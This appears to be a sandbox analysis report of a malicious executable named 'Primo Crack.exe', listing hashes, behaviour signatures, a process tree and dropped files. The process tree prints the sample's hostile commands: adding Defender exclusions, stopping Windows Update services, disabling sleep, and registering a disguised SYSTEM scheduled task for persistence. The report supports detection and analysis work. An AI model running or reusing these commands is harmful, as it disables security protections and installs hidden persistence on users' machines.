Analysis

  • max time kernel
    28s
  • max time network
    21s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2024, 19:24

General

  • Target

    Primo Crack.exe

  • Size

    21.8MB

  • MD5

    7bd9a2fb4321091b1dfbf6c0745647e4

  • SHA1

    11c4f761d6830aa197a09dd79c3d44c6c039a990

  • SHA256

    e9ab710bfd539b727c6059d390489350049f6b2a9967c0d878cb45147a11d1d2

  • SHA512

    aa9064f488c50bb96a23663890bbf8e8304209056f79a83c0adb754f50b5343cd0572e894e3bc30676513d38fd2d5b6787101efaba051780c0407fd48590dac5

  • SSDEEP

    393216:C33wl7xujbrQm+qSYtN0Pl2HBcif5fbovAHUSpTk0JhtlwN0/Cy7XZ4sI+WyZC8:QkxujbrQm+m0t2aglo4J9w+LZ4sI+jC8

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3472
      • C:\Users\Admin\AppData\Local\Temp\Primo Crack.exe
        "C:\Users\Admin\AppData\Local\Temp\Primo Crack.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Users\Admin\AppData\Local\Temp\cli_gui.exe
          "C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"
          3⤵
          • Executes dropped EXE
          PID:4436
        • C:\Users\Admin\AppData\Local\Temp\updater.exe
          "C:\Users\Admin\AppData\Local\Temp\updater.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5064
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1228
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4704
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1640
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:3740
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:4932
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3432
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3340
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
            PID:4880
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            3⤵
              PID:3352
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-dc 0
              3⤵
                PID:3312
            • C:\Windows\System32\dialer.exe
              C:\Windows\System32\dialer.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1132
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4676

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0olndqf.2d2.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\cli_gui.exe

            Filesize

            19KB

            MD5

            200b0db263eb5e5f206f675e68754752

            SHA1

            321e12424e920d1858d649733e091cddf4596490

            SHA256

            9a09528f04665f407b871562d26df3f1bf58a0d36e4311e749193fbdc40e4b9b

            SHA512

            ba78532edae85759201a7e6fa71012a1c64c90cce44c90ce3663ea41196ab611d31cf0a89d52cfb74dfbdb392911411466a7d24738674a4ad50b56f70bde3b4f

          • C:\Users\Admin\AppData\Local\Temp\updater.exe

            Filesize

            5.7MB

            MD5

            8cd62e3ece85c4c3e9f6f7c816256adf

            SHA1

            9712769be3f755c5ecbe68d38800a3a8ecdaf324

            SHA256

            39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b

            SHA512

            a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501

          • memory/316-82-0x000001DA16140000-0x000001DA16167000-memory.dmp

            Filesize

            156KB

          • memory/316-68-0x000001DA16140000-0x000001DA16167000-memory.dmp

            Filesize

            156KB

          • memory/388-77-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/388-75-0x00000278989D0000-0x00000278989F7000-memory.dmp

            Filesize

            156KB

          • memory/388-84-0x00000278989D0000-0x00000278989F7000-memory.dmp

            Filesize

            156KB

          • memory/404-81-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/404-78-0x0000021F41180000-0x0000021F411A7000-memory.dmp

            Filesize

            156KB

          • memory/404-85-0x0000021F41180000-0x0000021F411A7000-memory.dmp

            Filesize

            156KB

          • memory/612-59-0x000001DD1A3B0000-0x000001DD1A3D7000-memory.dmp

            Filesize

            156KB

          • memory/612-62-0x00007FFA152AD000-0x00007FFA152AE000-memory.dmp

            Filesize

            4KB

          • memory/612-117-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/612-56-0x000001DD1A380000-0x000001DD1A3A1000-memory.dmp

            Filesize

            132KB

          • memory/612-118-0x000001DD1A3B0000-0x000001DD1A3D7000-memory.dmp

            Filesize

            156KB

          • memory/660-60-0x0000015D27C30000-0x0000015D27C57000-memory.dmp

            Filesize

            156KB

          • memory/660-63-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/660-65-0x0000015D27C30000-0x0000015D27C57000-memory.dmp

            Filesize

            156KB

          • memory/660-70-0x00007FFA152AD000-0x00007FFA152AE000-memory.dmp

            Filesize

            4KB

          • memory/660-73-0x00007FFA152AF000-0x00007FFA152B0000-memory.dmp

            Filesize

            4KB

          • memory/660-76-0x00007FFA152AC000-0x00007FFA152AD000-memory.dmp

            Filesize

            4KB

          • memory/828-91-0x0000024652130000-0x0000024652157000-memory.dmp

            Filesize

            156KB

          • memory/828-100-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/944-71-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/944-67-0x00000254E5710000-0x00000254E5737000-memory.dmp

            Filesize

            156KB

          • memory/944-79-0x00000254E5710000-0x00000254E5737000-memory.dmp

            Filesize

            156KB

          • memory/1092-90-0x0000016E353A0000-0x0000016E353C7000-memory.dmp

            Filesize

            156KB

          • memory/1092-93-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/1092-95-0x0000016E353A0000-0x0000016E353C7000-memory.dmp

            Filesize

            156KB

          • memory/1104-97-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/1104-94-0x000002E6AEA60000-0x000002E6AEA87000-memory.dmp

            Filesize

            156KB

          • memory/1104-98-0x000002E6AEA60000-0x000002E6AEA87000-memory.dmp

            Filesize

            156KB

          • memory/1116-106-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/1116-103-0x000002AD46260000-0x000002AD46287000-memory.dmp

            Filesize

            156KB

          • memory/1132-41-0x00007FFA14250000-0x00007FFA1430E000-memory.dmp

            Filesize

            760KB

          • memory/1132-40-0x00007FFA15210000-0x00007FFA15405000-memory.dmp

            Filesize

            2.0MB

          • memory/1136-108-0x000001DD6CFA0000-0x000001DD6CFC7000-memory.dmp

            Filesize

            156KB

          • memory/1136-110-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/1260-112-0x0000020CD6590000-0x0000020CD65B7000-memory.dmp

            Filesize

            156KB

          • memory/1260-114-0x00007FF9D5290000-0x00007FF9D52A0000-memory.dmp

            Filesize

            64KB

          • memory/1820-22-0x00007FF63B1E0000-0x00007FF63B7A5000-memory.dmp

            Filesize

            5.8MB

          • memory/3200-0-0x0000000000400000-0x0000000001C1F000-memory.dmp

            Filesize

            24.1MB

          • memory/3200-21-0x0000000000400000-0x0000000001C1F000-memory.dmp

            Filesize

            24.1MB

          • memory/3200-1-0x0000000000400000-0x0000000001C1F000-memory.dmp

            Filesize

            24.1MB

          • memory/4676-45-0x0000026F760E0000-0x0000026F760F0000-memory.dmp

            Filesize

            64KB

          • memory/4676-43-0x00007FF9F5C90000-0x00007FF9F6751000-memory.dmp

            Filesize

            10.8MB

          • memory/4676-44-0x0000026F760E0000-0x0000026F760F0000-memory.dmp

            Filesize

            64KB

          • memory/5064-29-0x000002717F540000-0x000002717F562000-memory.dmp

            Filesize

            136KB

          • memory/5064-33-0x00007FF9F5C90000-0x00007FF9F6751000-memory.dmp

            Filesize

            10.8MB

          • memory/5064-34-0x000002717F5A0000-0x000002717F5B0000-memory.dmp

            Filesize

            64KB

          • memory/5064-35-0x000002717F5A0000-0x000002717F5B0000-memory.dmp

            Filesize

            64KB

          • memory/5064-38-0x00007FF9F5C90000-0x00007FF9F6751000-memory.dmp

            Filesize

            10.8MB